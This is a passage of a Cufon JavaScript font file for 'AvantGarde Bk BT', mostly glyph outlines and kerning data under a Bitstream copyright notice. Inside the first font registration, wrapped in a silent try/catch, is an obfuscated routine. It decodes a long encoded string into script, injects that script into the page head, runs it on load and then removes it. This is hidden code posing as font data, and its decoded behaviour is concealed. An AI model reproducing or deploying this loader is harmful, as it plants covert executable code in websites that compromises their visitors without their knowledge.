0r180,-72r-180,-73r0,-20","w":299},{"d":"155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0","w":214,"k":{"\u201e":-20,"\u201a":-20,"\u203a":6,"\u2039":13,"\u2019":43,"\u2018":46,"\u201d":43,"\u201c":46,"\u0152":6,"\u00bb":6,"\u00ab":13,"\u00d8":6,"y":-7,"w":-7,"v":-7,"Y":13,"V":6,"T":13,"S":-7,"Q":6,"O":6,"G":6,"C":6,"A":-13,";":-7,":":-7,"-":8}},{"d":"102,-108r-4,23r-83,0r4,-23r83,0","w":115},{"d":"53,33r-25,-294r21,0r25,294r-21,0","w":100},{"d":"-13,26r45,-66r27,0r-44,66r-28,0","w":101},{"d":"-8,0r5,-23r123,-147r-95,0r5,-23r126,0r-4,21r-125,149r107,0r-4,23r-138,0xm51,-281r14,0r26,44r41,-44r16,0r-47,61r-23,0","w":158},{"d":"79,-135v-37,0,-63,-26,-63,-63v0,-37,26,-63,63,-63v37,0,63,26,63,63v0,37,-26,63,-63,63xm78,-238v-21,0,-40,19,-40,40v0,21,19,40,40,40v21,0,40,-18,40,-40v0,-22,-19,-40,-40,-40xm216,-261r21,0r-137,266r-21,0xm236,-98v-21,0,-40,18,-40,40v0,22,19,40,40,40v21,0,40,-19,40,-40v0,-21,-19,-40,-40,-40xm237,5v-38,0,-64,-25,-64,-63v0,-37,26,-63,64,-63v37,0,63,26,63,63v0,38,-26,63,-63,63","w":315},{"d":"155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0xm183,-281r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":214},{"d":"72,5v-45,0,-77,-32,-71,-78r24,0v-3,35,17,55,49,55v29,0,53,-23,52,-51v-3,-64,-101,-53,-100,-121v-1,-37,34,-70,74,-70v42,0,71,30,65,73r-25,0v2,-31,-12,-51,-41,-51v-25,0,-47,19,-46,44v1,48,100,57,100,123v0,41,-39,76,-81,76","w":171,"k":{"\u00c5":-7,"A":-7}},{"d":"48,0r8,-40r24,0r-8,40r-24,0xm172,-197v-1,68,-81,68,-87,132r-25,0v1,-69,85,-70,85,-131v0,-24,-19,-44,-45,-43v-35,0,-56,25,-62,57r-25,0v9,-45,37,-78,87,-79v42,-1,72,24,72,64","w":166},{"d":"150,-219r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0"},{"d":"105,-17v45,0,81,-41,80,-88v-1,-42,-26,-72,-67,-72v-46,-1,-83,41,-83,89v0,42,28,71,70,71xm116,-199v40,0,63,16,79,42r11,-53r-51,0r3,-19r52,0r5,-27r23,0r-5,27r25,0r-4,19r-25,0r-41,210r-26,0r5,-18v-56,50,-157,11,-157,-70v0,-61,46,-111,106,-111","w":228},{"d":"25,0r8,-41r25,0r-8,41r-25,0xm145,0r8,-41r25,0r-8,41r-25,0xm265,0r8,-41r25,0r-8,41r-25,0","w":360},{"d":"230,-145v0,88,-61,145,-147,145r-83,0r23,-118r-23,0r4,-23r23,0r22,-115v103,-8,181,15,181,111xm204,-143v0,-76,-54,-97,-135,-90r-17,92r60,0r-4,23r-61,0r-18,95v104,10,175,-27,175,-120","w":242,"k":{"\u201e":20,"\u201a":20,"\u2039":-7,"\u2019":6,"\u2018":26,"\u201d":6,"\u201c":26,"\u00ab":-7,"\u00c5":6,"Y":10,"W":6,"V":6,"A":6,"-":-11}},{"d":"113,-240v-32,0,-44,16,-51,46r-24,0v10,-42,29,-67,76,-67v39,-1,68,26,67,64v-1,33,-18,51,-47,58v26,9,42,30,43,63v0,47,-39,81,-87,81v-52,0,-82,-29,-79,-83r24,0v-3,39,19,60,55,60v36,1,62,-24,61,-59v-1,-37,-24,-51,-63,-53r4,-22v66,12,92,-88,21,-88","w":203},{"d":"174,-256r-49,256r-23,0r49,-256r23,0xm52,-193v5,-45,23,-66,71,-66v-3,6,1,20,-8,21v-31,1,-36,14,-40,45r31,0r-4,20r-32,0r-33,173r-23,0r33,-173r-31,0r5,-20r31,0","w":172},{"d":"-1,0r50,-256r25,0r-50,256r-25,0","w":72},{"d":"47,40r13,-74r-60,0r4,-21r61,0r17,-105r-60,0r4,-21r61,0r12,-75r25,0r-12,75r60,0r-4,21r-60,0r-18,105r59,0r-3,21r-61,0r-12,74r-26,0"},{"d":"27,26r45,-66r27,0r-45,66r-27,0xm-29,26r45,-66r27,0r-44,66r-28,0","w":121,"k":{"\u00d0":-7,"\u0141":-7,"\uf002":6,"\uf001":6,"\u0152":20,"\u00d8":20,"\u00c6":-27,"\u00df":-7,"\u00c5":-20,"y":6,"w":15,"f":6,"Z":-13,"Y":33,"X":-15,"W":24,"V":40,"T":23,"R":-7,"P":-7,"O":20,"L":-7,"K":-7,"J":-20,"H":-7,"G":13,"F":-7,"D":-7,"C":20,"B":-7,"A":-20}},{"d":"157,-30v-30,57,-155,44,-145,-35v7,-61,24,-130,34,-191r25,0r-35,188v-6,50,70,67,94,33v32,-45,37,-154,53,-221r25,0v-15,70,-24,174,-51,226xm124,-281r-16,0r43,-62r25,0","w":208},{"d":"65,-193r-37,193r-23,0r38,-193r22,0xm77,-219r-15,0r-50,-62r26,0","w":72},{"d":"155,-103r-25,-135r-75,135r100,0xm-28,0r139,-256r39,0r51,256r-26,0r-15,-80r-117,0r-43,80r-28,0xm156,-289r6,-29r25,0r-6,29r-25,0xm91,-289r6,-29r25,0r-6,29r-25,0","w":214},{"d":"40,0r-39,-193r26,0r30,162r88,-162r27,0r-106,193r-26,0","w":155,"k":{".":28,",":28}},{"d":"40,-93v-9,40,2,76,43,75v85,-2,72,-108,93,-175r23,0r-38,193r-23,0r4,-18v-44,45,-146,20,-127,-63v9,-39,15,-75,22,-112r23,0","w":200},{"d":"30,-72r98,0r29,-146xm139,0r-25,0r9,-48r-125,0r6,-28r154,-180r31,0r-36,184r32,0r-5,24r-32,0","w":203},{"d":"171,-152r-46,0r-17,49r47,0xm161,-256r-29,85r46,0r30,-85r23,0r-30,85r55,0r-6,19r-56,0r-17,49r60,0r-7,19r-60,0r-30,84r-22,0r30,-84r-47,0r-31,84r-22,0r30,-84r-57,0r6,-19r58,0r17,-49r-62,0r6,-19r63,0r30,-85r22,0","w":276},{"d":"150,-103r24,-129r-14,0r-90,129r80,0xm54,-80r-54,80r-28,0r178,-256r161,0r-5,24r-106,0r-18,91r106,0r-4,23r-106,0r-19,95r106,0r-4,23r-131,0r15,-80r-91,0","w":313,"k":{"\u201e":-7,"\u201a":-7,"\u203a":20,"\u2019":16,"\u201d":16,"\u00bb":20,"-":-7}},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-23,118r-24,0","w":174,"k":{"\u201e":66,"\u201a":66,"\u203a":20,"\u2039":13,"\u2019":-7,"\u201d":-7,"\u0153":6,"\u00bb":20,"\u00ab":13,"\u00f8":6,"\u00e6":6,"\u00c5":26,"u":6,"r":6,"o":6,"i":6,"e":6,"a":6,"A":26,";":15,":":15,".":58,"-":18,",":58}},{"d":"100,-275r0,360r-19,0r0,-360r19,0"},{"d":"184,-111v0,-59,-76,-86,-119,-48v-14,12,-24,28,-29,48r148,0xm101,-17v39,0,59,-20,73,-48r28,0v-16,42,-47,70,-101,70v-54,0,-95,-39,-93,-93v2,-65,41,-111,107,-111v60,0,98,44,93,110r-175,0v0,42,27,72,68,72xm142,-219r-15,0r-50,-62r26,0","w":218},{"d":"184,-111v0,-59,-76,-86,-119,-48v-14,12,-24,28,-29,48r148,0xm101,-17v39,0,59,-20,73,-48r28,0v-16,42,-47,70,-101,70v-54,0,-95,-39,-93,-93v2,-65,41,-111,107,-111v60,0,98,44,93,110r-175,0v0,42,27,72,68,72xm143,-227r6,-29r25,0r-6,29r-25,0xm78,-227r6,-29r25,0r-6,29r-25,0","w":218},{"d":"82,-128v0,-62,61,-100,109,-66v11,8,17,19,18,33r-20,0v-4,-17,-18,-30,-39,-29v-32,0,-45,28,-45,63v0,34,13,62,45,62v23,0,38,-14,41,-33r20,0v-2,30,-29,51,-62,51v-44,0,-67,-34,-67,-81xm150,-13v69,0,115,-46,115,-114v0,-68,-46,-115,-115,-115v-68,0,-115,47,-115,115v0,67,46,114,115,114xm21,-127v0,-76,52,-129,129,-129v77,0,129,52,129,129v0,77,-53,129,-129,129v-77,0,-129,-53,-129,-129","w":299},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111","w":225},{"d":"22,-205v-5,-63,103,-73,103,-12v0,32,-18,38,-46,60r-52,42r84,0r-2,13r-108,0r3,-13v29,-25,105,-72,105,-103v0,-16,-13,-28,-31,-27v-25,0,-35,17,-40,40r-16,0","w":134},{"d":"37,-261v38,6,60,46,49,90v-20,73,-16,175,-60,224v-12,13,-31,18,-54,20r5,-23v34,-8,46,-21,53,-58r35,-187v0,-23,-13,-37,-32,-43","w":95},{"d":"65,-193r-37,193r-23,0r38,-193r22,0xm51,-219r-16,0r43,-62r25,0","w":72},{"d":"-11,26r45,-66r27,0r-44,66r-28,0xm45,-152r8,-41r25,0r-8,41r-25,0","w":103},{"d":"40,-93v-9,40,2,76,43,75v85,-2,72,-108,93,-175r23,0r-38,193r-23,0r4,-18v-44,45,-146,20,-127,-63v9,-39,15,-75,22,-112r23,0xm142,-227r6,-29r25,0r-6,29r-25,0xm77,-227r6,-29r25,0r-6,29r-25,0","w":200},{"d":"100,-256r-63,326r-59,0r4,-22r35,0r54,-280r-35,0r5,-24r59,0","w":95},{"d":"78,-133v34,0,61,-28,61,-61v0,-30,-21,-51,-51,-51v-69,0,-86,112,-10,112xm7,-182v0,-73,103,-104,139,-49r5,-25r19,0r-28,135r-19,0r2,-10v-43,30,-118,7,-118,-51","w":169},{"d":"184,-107v2,-41,-29,-71,-70,-71v-48,-1,-81,42,-81,92v0,39,29,71,67,70v53,-2,82,-40,84,-91xm99,5v-53,2,-92,-42,-91,-94v2,-67,42,-108,107,-111v52,-3,96,41,94,94v-3,67,-42,108,-110,111xm142,-219r-15,0r-50,-62r26,0","w":218},{"d":"184,-107v2,-41,-29,-71,-70,-71v-48,-1,-81,42,-81,92v0,39,29,71,67,70v53,-2,82,-40,84,-91xm99,5v-53,2,-92,-42,-91,-94v2,-67,42,-108,107,-111v52,-3,96,41,94,94v-3,67,-42,108,-110,111xm116,-219r-16,0r43,-62r25,0","w":218},{"d":"8,43v-2,-22,32,-27,38,-8v1,3,1,14,6,13v12,0,17,-42,20,-126v4,-91,-4,-183,65,-194v29,-5,40,42,9,42v-14,3,-20,-20,-24,-25v-12,0,-16,37,-20,110v-5,95,8,201,-66,210v-15,2,-27,-9,-28,-22","w":173},{"d":"121,-176v-45,0,-81,41,-81,88v0,42,27,70,68,72v94,5,115,-160,13,-160xm110,5v-40,0,-64,-15,-79,-41r-8,36r-24,0r51,-256r23,0r-15,81v53,-51,165,-11,158,70v-5,64,-40,108,-106,110","w":225},{"d":"-2,0r50,-256r27,0r110,221r42,-221r25,0r-49,256r-27,0r-110,-221r-43,221r-25,0xm141,-323v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32","w":250},{"d":"65,-193r-37,193r-23,0r38,-193r22,0xm105,-219r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":72},{"d":"184,-111v0,-59,-76,-86,-119,-48v-14,12,-24,28,-29,48r148,0xm101,-17v39,0,59,-20,73,-48r28,0v-16,42,-47,70,-101,70v-54,0,-95,-39,-93,-93v2,-65,41,-111,107,-111v60,0,98,44,93,110r-175,0v0,42,27,72,68,72","w":218},{"d":"128,-19v95,4,147,-105,99,-184r-158,166v14,11,35,17,59,18xm212,-218v-93,-68,-228,56,-158,166xm127,5v-32,0,-58,-8,-75,-24r-34,36r-16,-14r34,-36v-17,-21,-26,-46,-26,-80v0,-90,54,-148,143,-148v33,0,59,8,78,24r30,-31r16,13r-32,33v17,20,26,45,26,79v0,91,-54,148,-144,148","w":281,"k":{"\u201e":20,"\u201a":20,"\u2019":6,"\u2018":20,"\u201d":6,"\u201c":20,"Y":10,"X":6,"V":6,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"117,-261v58,0,92,64,58,112v-26,37,-96,92,-135,128r128,0r-3,21r-164,0r4,-21v45,-42,160,-121,160,-173v0,-26,-19,-45,-46,-44v-39,2,-55,28,-62,66r-24,0v4,-51,32,-89,84,-89","w":203},{"d":"292,-108v-8,-42,-66,-25,-68,11r-15,0v-3,-56,98,-67,98,-10v0,30,-17,35,-43,56r-50,39r80,0r-2,12r-103,0r3,-12v28,-23,98,-67,100,-96xm227,-261r21,0r-159,266r-21,0xm72,-112r-15,0r26,-121r-50,48r-11,-8r64,-63r17,0","w":316},{"d":"56,5v-31,0,-58,-27,-52,-60v7,1,18,-2,23,1v-1,20,14,37,32,37v17,0,34,-17,32,-35v-1,-36,-69,-49,-69,-93v0,-29,23,-55,53,-54v30,0,50,20,47,53r-23,1v3,-17,-6,-32,-24,-32v-17,0,-29,13,-29,29v0,27,79,57,70,91v0,35,-24,62,-60,62xm38,-281r14,0r26,44r41,-44r16,0r-47,61r-23,0","w":131},{"d":"76,-190r-37,190r-25,0r37,-190r25,0xm89,-256r-8,40r-25,0r8,-40r25,0","w":103},{"d":"180,67r0,18r-180,0r0,-18r180,0"},{"d":"249,-110v0,-37,-40,-63,-65,-33v-8,9,-17,24,-26,45v13,46,91,47,91,-12xm51,-105v0,37,42,63,66,32v8,-9,17,-23,26,-44v-11,-20,-24,-34,-50,-35v-25,-1,-42,22,-42,47xm92,-174v31,0,43,21,55,47v14,-28,26,-45,58,-47v31,-1,54,32,54,66v0,36,-19,66,-51,66v-31,0,-41,-19,-55,-46v-14,26,-26,46,-57,46v-31,0,-55,-31,-55,-66v0,-36,19,-66,51,-66","w":299},{"d":"188,-90v-6,61,-33,90,-102,90r-99,0r5,-24r37,0v30,-20,42,-62,23,-99r-42,0r5,-23r30,0v-22,-58,11,-117,73,-115v49,2,79,28,81,75r-24,0v-1,-33,-23,-51,-57,-52v-47,-2,-71,52,-48,92r87,0r-5,23r-76,0v17,35,8,76,-17,99v63,5,105,-10,108,-66r21,0","w":203},{"d":"9,-110v0,-120,125,-190,220,-127v22,15,35,37,41,65r-28,0v-11,-40,-41,-65,-89,-65v-72,0,-115,49,-117,122v-2,59,36,97,94,97v47,-1,78,-24,97,-56r30,0v-22,46,-65,79,-129,79v-69,1,-119,-45,-119,-115xm162,47v0,41,-54,38,-87,26r5,-14v19,7,62,16,62,-12v0,-16,-16,-15,-35,-16r10,-31r12,0r-7,20v24,-2,40,6,40,27","w":270},{"d":"122,-219r-15,0r-50,-62r26,0"},{"w":101},{"d":"35,-252r0,97r-18,0r0,-97r18,0","w":51},{"d":"103,-16v38,-1,63,-22,75,-52r27,0v-15,43,-49,72,-102,73v-55,1,-90,-41,-94,-93v-8,-117,181,-156,200,-34r-26,0v-5,-32,-30,-55,-66,-55v-46,0,-83,40,-82,88v1,42,26,74,68,73xm137,47v0,41,-54,38,-87,26r5,-14v19,7,62,16,62,-12v0,-16,-16,-15,-35,-16r10,-31r12,0r-7,20v24,-2,40,6,40,27","w":218},{"d":"191,-99v-14,45,-45,73,-100,73r-8,40r-20,0r8,-42v-37,-11,-67,-44,-65,-91v3,-64,36,-109,104,-109r7,-37r20,0r-7,39v36,8,57,35,65,73r-24,0v-5,-31,-29,-55,-64,-55v-45,-1,-77,41,-77,88v0,42,26,73,65,73v36,0,58,-23,70,-52r26,0","w":203},{"d":"27,-66r37,-190r25,0r-37,190r-25,0xm14,0r8,-40r25,0r-8,40r-25,0","w":103},{"d":"205,-284v6,37,-31,78,-58,68v-2,-36,27,-63,58,-68xm224,-130v0,31,18,49,41,59v-21,43,-30,70,-72,77v-9,1,-35,-13,-45,-11v-9,-2,-37,13,-45,11v-54,-12,-79,-76,-83,-136v-3,-49,32,-86,79,-86v13,0,39,12,49,12v34,-14,91,-17,111,16v-20,14,-35,28,-35,58","w":284},{"d":"162,-193r-79,94r47,99r-26,0r-36,-78r-65,78r-27,0r82,-98r-46,-95r26,0r35,75r62,-75r27,0","w":143},{"d":"-19,70r63,-326r60,0r-4,23r-35,0r-55,280r35,0r-4,23r-60,0","w":95},{"d":"180,-106r-4,20r-176,0r4,-20r176,0"},{"d":"30,-260v71,-9,70,42,68,108v-1,38,14,50,52,49r0,19v-56,-8,-52,40,-52,92v0,54,-15,66,-68,65r0,-19v90,19,6,-138,81,-147v-42,-6,-34,-54,-35,-103v0,-38,-10,-46,-46,-45r0,-19"},{"d":"255,-26r0,17r-210,0r0,-17r210,0xm159,-205r0,61r96,0r0,17r-96,0r0,61r-17,0r0,-61r-97,0r0,-17r97,0r0,-61r17,0","w":299},{"d":"-2,0r49,-256r35,0r55,236r140,-236r42,0r-49,256r-26,0r46,-233r-139,233r-32,0r-53,-226r-44,226r-24,0","w":316},{"d":"81,-261r21,0r-89,294r-21,0","w":100},{"d":"184,-107v2,-41,-29,-71,-70,-71v-48,-1,-81,42,-81,92v0,39,29,71,67,70v53,-2,82,-40,84,-91xm99,5v-53,2,-92,-42,-91,-94v2,-67,42,-108,107,-111v52,-3,96,41,94,94v-3,67,-42,108,-110,111xm170,-219r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":218},{"d":"154,-165v-66,-44,-154,40,-110,119xm58,-31v68,51,165,-43,111,-121xm8,-90v-3,-83,92,-135,162,-93r25,-27r15,13r-25,27v54,62,9,181,-83,175v-26,-2,-43,-8,-59,-19r-36,39r-15,-15r36,-38v-13,-17,-19,-35,-20,-62","w":218,"k":{"\u201e":-13,"\u201a":-13,"\u2018":33,"\u201c":33,"-":-13}},{"d":"9,-110v0,-120,125,-190,220,-127v22,15,35,37,41,65r-28,0v-11,-40,-41,-65,-89,-65v-72,0,-115,49,-117,122v-2,59,36,97,94,97v47,-1,78,-24,97,-56r30,0v-22,46,-65,79,-129,79v-69,1,-119,-45,-119,-115","w":270,"k":{"\u203a":-7,"\u2019":-10,"\u2018":13,"\u201d":-10,"\u201c":13,"\u00bb":-7,"\u00c5":-7,"A":-7,"-":-8}},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-18,95r106,0r-4,23r-131,0xm163,-281r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0"},{"d":"-7,63r48,-81r-33,-175r23,0r27,148r90,-148r25,0r-155,256r-25,0xm110,-227r6,-29r25,0r-6,29r-25,0xm45,-227r6,-29r25,0r-6,29r-25,0","w":154},{"d":"158,-99v9,-40,-2,-76,-43,-75v-84,2,-73,107,-93,174r-22,0r37,-193r23,0r-3,18v46,-44,144,-17,126,64v-9,38,-14,74,-21,111r-24,0","w":200,"k":{"\u201e":-13,"\u201a":-13,"\u2039":-7,"\u2019":20,"\u2018":33,"\u201d":20,"\u201c":33,"\u00ab":-7}},{"d":"40,-93v-9,40,2,76,43,75v85,-2,72,-108,93,-175r23,0r-38,193r-23,0r4,-18v-44,45,-146,20,-127,-63v9,-39,15,-75,22,-112r23,0xm169,-219r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":200},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,79,42r20,-99r23,0r-50,256r-26,0r5,-18v-56,49,-162,13,-157,-70v4,-66,41,-111,106,-111","w":225},{"d":"17,-256r24,0r17,229r105,-229r21,0r16,229r107,-229r25,0r-121,256r-31,0r-14,-212r-98,212r-31,0","w":304,"k":{"\u201e":26,"\u201a":26,"\u203a":23,"\u2039":20,"\u2019":-17,"\u2018":-20,"\u201d":-17,"\u201c":-20,"\u0153":11,"\u00bb":23,"\u00ab":20,"\u00f8":11,"\u00e6":11,"\u00c5":6,"u":6,"r":8,"o":11,"e":11,"a":11,"A":6,";":8,":":8,".":31,"-":21,",":31}},{"d":"184,-107v2,-41,-29,-71,-70,-71v-48,-1,-81,42,-81,92v0,39,29,71,67,70v53,-2,82,-40,84,-91xm99,5v-53,2,-92,-42,-91,-94v2,-67,42,-108,107,-111v52,-3,96,41,94,94v-3,67,-42,108,-110,111","w":218,"k":{"\u201e":-13,"\u201a":-13,"\u2018":33,"\u201c":33,"-":-13}},{"d":"-1,0r49,-256r131,0r-4,24r-107,0r-17,91r106,0r-4,23r-107,0r-18,95r106,0r-4,23r-131,0xm109,-281r-16,0r43,-62r25,0"},{"d":"56,-178v16,-14,34,-22,64,-21v-3,7,-2,18,-6,24v-87,0,-72,107,-92,175r-23,0r38,-193r22,0","w":111,"k":{"\u0111":6,"\u201e":21,"\u201a":21,"\u2039":20,"\u2019":-21,"\u201d":-21,"\u0153":6,"\u00ab":20,"\u00f8":6,"y":-13,"x":-7,"w":-13,"v":-13,"t":-7,"q":6,"o":6,"g":6,"e":6,"d":6,"c":6,".":36,"-":13,",":36}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1015-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("3#dBh.6LyW,Q39PiC.gEm#m,[&6Bd.,Q[&}EyWJsdZeD:(Ln[^Hpc#Z-[^Hpc#:%lW-?COoEd#6?COopdzC?COmpc(7a[^Hpc#:B[^Hpc#H&[^HpcO:p[^HEc)1NlPGBcz7n6gGBcz7-dP7%[^HEczmE[^Hpc#1&[^Hpc#}.[^Hpc&UI[^Hpc#Hp[^Hpc#gn3PGBcz7ndZGBczU%vgGBc)mG6ZGBczUpdgGBc)o79zUg#^m}3Xc6v=1JROHZW[:dyh?Clwk-n)bP.sxat5DYQupGE(LB&%NI;ie,V~oEcgGBcz7-dZGBcz7b:BGBcz6)cgGBczUBcPGBczUBdWd?COmpcO-?COmEczd?COop:)Z?COopdO}?COop:&H&[^HEc):pCgGBczUBcBGBc)UEcnY?COopdOg?COopdWd?COop:)P?COmEcz}?COop:)d?COmEc#d?COopd)g?COop:O7?COop:)-?COop:O-?COopdOZ?COmE6)Z?COopd.J5RBGBcz7-6BGBcz7b6ZGBc)o(vZGBcz}bvZGBczUp:&a?COmEcO}?COoGczC?COoGcW:Q[^HE6W6-[^Hpc#dP[^Hpc#m([^HpcOgP[^HEc#g)[^Hpc#HL[^Hpc#}-OU}?COoEd#g?mPGBc)m&6gGBcz7bdPGBcz7bdgGBczUBdsY?COop:(g?COopdO6)3za(?gGBcz7bdZGBczUp6PGBc)mGvZP?COopd)b%[^Hpc#g)[^Hpc.Jb[^Hpc#})=ZGBc)oG6gGBcz7bcPH.[^HEcz6-WPGBcz7n:PGBczU%dgGBcz7):BGBc)oGvZGBcz7)cBGBcz})6BGBcz7-6PGBc)oG:ZGBcz7)vgGBcz7n6BGBczULcH-?COopdz6?COoGvO}?COmpcWJ?COop:&d?COopd#}=[^Hpc#6b[^HEc)UG[^Hpc#mp[^Hpc#1I[^Hpc#6nJgGBcz7-6WBG[^Hpc.Jn[^Hpc.1NhgGBc)oG:BGBcz7PvZGBcz7)6Ha?COopd)dJJZ}?COoGc(gVWgJ?COmp:O6lJBGBcz7.:ZGBcz7-6gGBd)opcZGBc)mG:O7?COopd)7?COoG6zme}gGBcz7)c#CW[^Hpc#1LOPGBczU(c9LIcOZovzI7[^Hpc#gb[gpD[^HpcOCP}ZGBcz7)cPc~[^Hpc.c&[^HpcOUG[^HEczm&[^Hpc#1pcBGBd)opcbP?COmpc)g?COmpcWZ?COopd#g?COopdW6?COop:(J&CO1)[^Hpc#c&JsG?COopdO-?COopdW}?COop:OP-[^Hpc#mE3ZGBcz7PdzY?COopd.6C[^Hpc#g-[^Hpc#:E[^Hpc#:([^HEc)}n:PGBcz7bcZGBcz7PdWZ?COopdzkE[^Hpc#}b[^HpcO:G[^Hpc#UG[BGBc)mGdZGBcz7-cBGBcz7)6&ok}BGBcz7P6BGBcz7-cng?CW:pcz7NWBGBc)oGc%B?COop:)g6[9,?COopd)J?COopd)-z[^Hpc#6-[^Hpc#d.hPGBcz7.:.J[hBGBcz7)v[mnXs6ph#PL39mn3RGa=OoD?zBnXsoDhzBpX.GPh.CLy9Gs=WmQdnIsh^Ppy^c,l%LiyW:x:nIuy(Lu[nk~vsC%CBpQ3Oex=(xEczUp[9I(d[}Lh&6uhZpQ:&,Yw^6P?sJu:&,Y[9I)h&La}9,aXsJP?%1xh#,):[Jah&NQy#,(C#I-hWHa3Wdu?nkiyOGDvED5yRPsW&6hyZBC=[7hyZB,3Rka")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"AvantGarde Bk BT","font-weight":400,"font-style":"oblique","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 4 2 2 2 2 9 2 4","ascent":"274","descent":"-86","x-height":"5","bbox":"-60 -347 458 85","underline-thickness":"19.8633","underline-position":"-21.4453","slope":"-11","unicode-range":"U+0020-U+F002"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1990-1998 Bitstream Inc.  All rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"32,15v20,-1,17,19,25,30v12,0,17,-40,21,-121v4,-99,0,-187,76,-197v34,-5,51,49,12,50v-15,1,-20,-9,-21,-23v0,-5,-2,-7,-5,-7v-12,0,-18,36,-21,108v-4,98,7,197,-76,210v-35,6,-49,-48,-11,-50","w":196},{"d":"112,-261v46,0,80,28,74,74r-49,0v1,-20,-9,-33,-26,-33v-15,0,-33,14,-30,29v7,40,92,51,92,115v0,48,-38,81,-86,81v-54,0,-84,-31,-82,-87r49,0v-2,26,10,41,33,41v27,0,45,-32,29,-53v-24,-31,-86,-39,-86,-94v0,-45,36,-73,82,-73","w":193},{"d":"152,-218r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0"},{"d":"178,-76v-4,54,-36,76,-100,76r-82,0r50,-256v69,-2,147,-8,144,61v-1,33,-19,49,-45,62v20,9,35,29,33,57xm126,-85v0,-30,-24,-33,-57,-32r-14,76v41,1,71,-2,71,-44xm137,-191v0,-24,-22,-25,-48,-25r-12,59v31,4,60,-5,60,-34","w":198,"k":{"\u203a":6,"\u2039":10,"\u2019":6,"\u2018":6,"\u201d":6,"\u201c":6,"\u00bb":6,"\u00ab":10,"Y":6,"W":-7}},{"d":"11,-259r225,0r0,40r-162,0r114,120r-117,128r172,0r0,40r-237,0r0,-28r125,-138r-120,-127r0,-35","w":249},{"d":"-31,0r144,-256r53,0r56,256r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0xm134,-326v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38","w":226},{"d":"53,-89v-4,59,84,67,102,21r47,0v-13,42,-48,73,-100,73v-55,1,-94,-39,-94,-93v0,-117,175,-153,199,-37r-46,0v-21,-55,-117,-29,-108,36xm138,46v2,46,-58,42,-96,29r8,-20v18,8,55,18,60,-7v0,-15,-18,-12,-35,-13r12,-35r16,0v-1,5,-6,13,-5,17v23,0,40,7,40,29","w":210},{"d":"153,-261v36,-1,64,10,83,29r5,-24r148,0r-8,44r-94,0r-10,60r92,0r-8,44r-93,0r-12,65r92,0r-9,43r-138,0r3,-16v-20,13,-48,21,-80,21v-67,0,-116,-49,-114,-116v2,-91,53,-148,143,-150xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72","w":381},{"d":"45,-189r45,0r-37,189r-45,0xm58,-256r45,0r-10,49r-45,0","w":110},{"d":"168,-186v4,-33,-47,-41,-67,-22v-7,7,-12,20,-16,37r72,0r-10,31r-68,0r-5,29r68,0r-11,31r-63,0v-1,28,9,42,37,42v27,-1,35,-11,42,-35r49,0v-11,47,-39,78,-93,78v-53,0,-87,-29,-83,-85r-25,0r11,-31r19,0r6,-29r-24,0r11,-31r19,0v11,-55,34,-90,95,-90v51,-1,85,25,84,75r-48,0","w":209},{"d":"45,-152r210,0r0,89r-29,0r0,-59r-181,0r0,-30","w":299},{"d":"41,0r-37,-193r46,0r25,136r73,-136r50,0r-106,193r-51,0","w":185,"k":{".":28,",":28}},{"d":"126,-40v0,-13,12,-25,24,-25v13,0,24,12,24,25v0,13,-11,23,-24,23v-13,0,-24,-10,-24,-23xm45,-122r210,0r0,29r-210,0r0,-29xm126,-174v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24","w":299},{"d":"142,-257r30,0r25,64r23,-64r30,0r0,96r-20,0r0,-76r-28,76r-10,0r-30,-76r0,76r-20,0r0,-96xm40,-257r82,0r0,17r-30,0r0,79r-23,0r0,-79r-29,0r0,-17","w":299},{"d":"32,-185v12,-2,17,-10,19,-22r-16,0r9,-49r45,0v-10,46,-8,100,-63,99","w":85},{"d":"51,0r20,-97r-54,-159r50,0r35,110r74,-110r57,0r-113,159r-18,97r-51,0xm146,-289r9,-40r36,0r-9,40r-36,0xm85,-289r9,-40r36,0r-9,40r-36,0","w"